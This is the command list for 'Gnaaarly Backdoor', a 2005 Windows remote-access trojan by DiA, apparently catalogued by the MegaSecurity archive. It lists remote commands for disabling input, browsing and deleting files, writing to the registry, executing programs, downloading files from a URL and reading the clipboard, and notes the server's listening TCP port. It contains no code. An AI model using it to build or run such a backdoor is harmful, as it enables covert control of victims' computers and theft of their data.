Gnaaarly Backdoor
(Backdoor.Win32.VB.ago)
(Backdoor.Win32.Small.gp)

by DiA

Released in May 2005



Commands:

Client
######
!help					- this help
!cls					- clear screen
!quit					- close client, server is still open

Server
######
Fun:
  !msgbox 'Caption' 'Message'		- shows a message box
  !mouse 'disable/enable'		- disables or enables mouse
  !input 'disable/enable'		- disables or enables keyboard and mouse
  !cdrom 'open/close'			- open or close cd-rom
  !start 'hide/show'			- hide or show windows start button
  !monitor 'on/off'			- turns monitor on or off
Examples:
  !msgbox 'Gnaaarly Backdoor' 'A gnaaarly backdoor is running...'
  !mouse 'disable'
  !mouse 'enable'
  !input 'disable'
  !input 'enable'
  !cdrom 'open'
  !cdrom 'close'
  !start 'hide'
  !start 'show'
  !monitor 'off'
  !monitor 'on'

Paths:
  !windowspath				- returns windows directory
  !systempath				- returns system directory
  !location				- returns the location of the running server
  !getdirectory				- returns the current directory
  !setdirectory 'Path'			- set a new current directory
Examples:
  !setdirectory 'C:\Windows'

Lists:
  !dirlist 'Path'			- list all directories in path
  !filelist 'Path'			- list all directories in path
Examples:
  !dirlist 'D:\'
  !filelist 'C:'

Files:
  !copyfile 'Existing' 'New'		- copy a file, does not copy if it already exists
  !movefile 'Existing' 'New'		- move a file, does not move if it already exists
  !deletefile 'Existing'		- deletes an existing file
Examples:
  !copyfile 'C:\Windows\Notepad.exe' 'C:\Editor.exe'
  !movefile 'C:\Editor.exe' 'C:\edit.exe'
  !deletefile 'C:\edit.exe'

Registry:
  !regwrite 'HKEY' 'Subkey' 'Name' 'Value' - write a string to the registry
  !regread 'HKEY' 'Subkey' 'ValueName'	   - returns a string from registry
Examples:
  !regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly'
  !regread 'HKEY_LOCAL_MACHINE' 'SOFTWARE\Microsoft\Windows\CurrentVersion' 'ProductId'

Applications:
  !execute 'Path'			- executes an application
Examples:
  !execute 'C:\Windows\Notepad.exe'

Internet:
  !download 'URL' 'Path'		- download a file from inet to local
Examples:
  !download 'http://home.arcor.de/vx-dia/index.htm' 'C:\firstpage.htm'

Exit Windows:
  !shutdown				- shutdown windows
  !reboot				- reboot windows

Clipboard:
  !getclipboard				- returns the text in the clipboard if any exists
  !setclipboard 'Text'			- copy a new text into clipboard
Examples:
  !setclipboard 'visit www.vx-dia.de.vu !!!'

Connection:
  !close	
  
DiA  


Server:
size: 13,824 bytes

port: 30687 TCP

tested on Windows XP
February 07, 2006

MegaSecurity